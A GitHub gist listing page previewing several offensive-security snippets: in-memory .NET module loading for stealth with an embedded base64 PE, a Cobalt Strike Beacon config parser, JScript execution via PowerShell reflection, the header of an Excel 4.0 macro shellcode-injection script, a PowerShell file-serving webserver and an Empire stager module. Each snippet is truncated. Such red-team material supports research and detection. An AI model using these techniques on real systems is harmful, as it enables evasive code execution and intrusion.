Skip to content

Instantly share code, notes, and snippets.

View GeneralTesler's full-sized avatar

2XXE GeneralTesler

20 followers · 16 following
View GitHub Profile
@mattifestation
mattifestation / LoadInMemoryModule.ps1
Created March 30, 2018 18:01
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
@sixdub
sixdub / beacon.ksy
Created April 6, 2021 21:17
meta:
id: beaconconfig
title: Cobalt Strike Beacon Config
endian: be
doc: |
Cobalt Strike Beacon is a popular offensive security tool. Beacon itself
is a DLL that gets injected into memory and can be staged from C2 servers.
The Beacon DLL (in unencoded form) contains a configuration section that gets
patched by the C2 server. This section is a fixed predictable structure
@gabemarshall
gabemarshall / jscript.ps1
Created January 3, 2018 15:30
Executing JScript from Powershell via .NET reflection
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'
[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());
@Philts
Philts / Invoke-ExShellcode.ps1
Last active March 5, 2021 23:43
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#
@obscuresec
obscuresec / dirtywebserver.ps1
Created May 18, 2014 15:36
Dirty PowerShell Webserver
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8000/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
$HRes.ContentLength64 = $Buf.Length
$HRes.OutputStream.Write($Buf,0,$Buf.Length)
@ejcx
ejcx / jwtex_test.go
Created November 17, 2018 18:13
package jwtex
import (
"encoding/base64"
"encoding/json"
"fmt"
"strings"
"testing"
)
@infosecn1nja
infosecn1nja / starfighter_js.py
Created July 21, 2017 23:45
Empire stagers module to generates a .js launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'JS Launcher StarFighter',
'Author': ['Cn33liz'],